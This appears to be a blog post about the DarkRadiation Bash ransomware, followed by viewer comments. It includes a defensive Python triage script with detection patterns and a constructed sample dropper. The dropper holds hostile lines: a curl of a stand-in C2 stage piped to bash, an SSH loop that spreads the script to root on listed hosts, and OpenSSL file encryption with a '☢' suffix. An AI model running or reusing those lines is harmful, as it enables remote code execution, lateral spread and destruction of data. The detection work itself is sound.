SSH-wormable, written in Bash, self-updating and hard to detect: the DarkRadiation ☢️ Ransomware

This new ransomware is cut from a different cloth. Let us discuss:

* SSH wormable: spreads to other hosts over SSH
* Encrypts files with AES via OpenSSL
* Mutates (obfuscated) so antivirus signatures can't catch it
* Written in Bash
* Still under development
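A few triage checks for the traits listed above, as an added example written for this page (not the DarkRadiation script and not code from the video): scoring a Bash script for obfuscation and SSH fan-out indicators, flagging files whose extension is a bare symbol such as ☢, and telling whether an SSH private key on the box is stored without a passphrase. The indicator patterns and weights, the filename rule, and every sample input (dropper, benign script, key fragments) are assumptions constructed for the example.

```python
"""Triage checks for the traits listed above: an obfuscated Bash dropper,
OpenSSL AES file encryption, SSH fan-out, emoji-suffixed file names, and the
passphrase-less private key that makes the SSH hop cheap.

Added example written for this page; not the DarkRadiation script and not code
from the video. Indicator patterns, weights, the filename rule and all samples
below are assumptions constructed for illustration."""
import base64
import os
import re
import struct
import unicodedata

# (pattern, weight, label): assumed indicators of an obfuscated or malicious Bash script.
INDICATORS = [
    (re.compile(r"\beval\b"), 2, "eval of a constructed string"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), 2, "base64 decode stage"),
    (re.compile(r"\$'\\x[0-9a-fA-F]{2}"), 1, "hex-escaped literal"),
    (re.compile(r"\|\s*(ba)?sh\b"), 2, "decoded text piped into a shell"),
    (re.compile(r"\bopenssl\s+enc\b.*-aes"), 2, "OpenSSL AES file encryption"),
    (re.compile(r"\bssh\b.*StrictHostKeyChecking=no"), 2, "non-interactive SSH fan-out"),
]
LONG_LINE = 400  # assumed threshold: obfuscators tend to emit one huge line


def obfuscation_report(script: str) -> dict:
    """Score a Bash script; each indicator counts once, plus a long-line bonus."""
    score, hits = 0, []
    for rx, weight, label in INDICATORS:
        if rx.search(script):
            score += weight
            hits.append(label)
    if any(len(line) > LONG_LINE for line in script.splitlines()):
        score += 2
        hits.append("very long line")
    return {"score": score, "hits": hits}


def looks_ransomware_renamed(path: str) -> bool:
    """True when the final extension consists only of symbol characters (e.g. '☢').
    Variation selectors such as U+FE0F (category Mn) are dropped first."""
    name = os.path.basename(path)
    if "." not in name:
        return False
    ext = "".join(c for c in name.rsplit(".", 1)[1] if unicodedata.category(c) != "Mn")
    return bool(ext) and all(unicodedata.category(c) == "So" for c in ext)


OPENSSH_MAGIC = b"openssh-key-v1\x00"


def ssh_key_unprotected(key_text: str) -> bool:
    """True if the private key can be used without a passphrase.
    OpenSSH format: after the magic comes a length-prefixed cipher name, 'none'
    for a cleartext key. Legacy PEM: encrypted keys carry 'Proc-Type: 4,ENCRYPTED'.
    PKCS#8: the BEGIN line itself says ENCRYPTED."""
    lines = [l.strip() for l in key_text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN ") or "PRIVATE KEY" not in lines[0]:
        raise ValueError("not a PEM-wrapped private key")
    if "ENCRYPTED PRIVATE KEY" in lines[0]:
        return False
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        (clen,) = struct.unpack(">I", body[off:off + 4])
        return body[off + 4:off + 4 + clen] == b"none"
    return not any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines)


# --- constructed samples (not real malware, not real keys) ---
SAMPLE_DROPPER = r"""#!/bin/bash
_0x1=$(echo 'ZWNobyBoaQ==' | base64 -d)
eval "$_0x1"
p=$'\x2f\x74\x6d\x70'
curl -fsSL "$C2/stage2.sh" | bash
for h in $(cat "$p/hosts.txt"); do ssh -o StrictHostKeyChecking=no "root@$h" 'bash -s' < "$0"; done
openssl enc -aes-256-cbc -salt -in "$f" -out "$f.☢" -k "$KEY"
"""
SAMPLE_BENIGN = "#!/bin/bash\nset -euo pipefail\ntar czf backup.tgz /etc\necho done\n"


def _openssh_fragment(cipher: bytes) -> str:
    """Constructed OpenSSH-format fragment: magic + cipher name and nothing else."""
    body = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(body).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


SAMPLE_KEY_PLAIN = _openssh_fragment(b"none")
SAMPLE_KEY_ENCRYPTED = _openssh_fragment(b"aes256-ctr")
SAMPLE_PEM_ENCRYPTED = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                        "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nAAAA\n"
                        "-----END RSA PRIVATE KEY-----\n")

if __name__ == "__main__":
    print(obfuscation_report(SAMPLE_DROPPER))
    print(obfuscation_report(SAMPLE_BENIGN))
    print(looks_ransomware_renamed("/srv/data/report.docx.☢"))
    print(ssh_key_unprotected(SAMPLE_KEY_PLAIN), ssh_key_unprotected(SAMPLE_KEY_ENCRYPTED))
```

Run it as a file to print the sample results. On a real machine, feed each non-`.pub` file under `~/.ssh` to `ssh_key_unprotected`, or use the stock equivalent `ssh-keygen -y -P '' -f KEY >/dev/null`, which succeeds only on a key stored without a passphrase. The obfuscation score is a triage hint, not a verdict: a legitimate installer can hit two or three indicators, so review anything that scores high rather than blocking on the number.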

Stay Awesome,
Hussein
Comments

That small giggle at the end after discovering something weird / cool is the feeling we have had at least once.

kevinshah_tv

I subscribed to you because of this video!
Great job. Look forward to watching all your other videos.

LVLV

Lateral network movement can be quite easily detected by using a network anomaly detection solution. Also, a firewall with IPS and Antibot can be quite useful for detecting CnC, but would require some engineering to properly implement it :). Great video. Great attack :)

JernMr

The way I see it, this is wormable, but not yet a worm. It doesn't spread by itself, it's spread through commands from C&C. This one is definitely not the first (although these things are less common on Linux, but more common on Windows), the Bash obfuscation is pretty new though. Most just try to hide their processes and files (this one tries to do the same).
7:02 maybe Red Buts? (possibly red butts?)
9:54 the developer computer has the private key, so the developer computer needs to be infected. But usually incoming SSH is turned off on laptops and the laptop is behind NAT and not directly Internet connected.
12:12 pretty certain the attacker obfuscates it before uploading to a victim. They were just able to recognize the method that was used.
15:28 emojis are just Unicode characters and Unicode characters are allowed in filenames.

autohmae

I find it absolutely fascinating. I wonder what it will be like when they start using more advanced AI (imagine asking GPT v10 to build you a never seen before virus)

yourpersonaldatadealer

As a linux user, I really want to take a look at bash source code.

AbhinavKulshreshtha

That is why you have to use a password on your keypair.

professortrog

Dear fellow viewer, are there more channels which talk about similar backend and SW analysis?

NaveenTulsi

Well, we were also hit by a worm. They were mining bitcoin on our machine. Our dev machine got extremely slow and then we saw most of our CPU was being eaten by bitcoin mining process. Later we figured out that it came from postgres port which we were using to connect dev db to our local machine.

nikhilsinghal

Ransomware updating itself. This seems to be the most dangerous feature.

It should be an update registration, and every running service should have its own user to stop random applications from having root access.

Also, the pgp or hashing abilities should be exclusive to very few absolutely necessary applications. Not everything needs to be encrypted.

gmanon

Please kindly upload videos on AWS AND AZURE ISSUES AND TROUBLESHOOTING

supriyochatterjee

13:15 This is why humans will corrupt advanced AI in the future, resulting in total chaos

UzairAli

Node brought us the best and worst of the Web

siya.abc

Shouldn't be too hard to create such a script.

MartinsTalbergs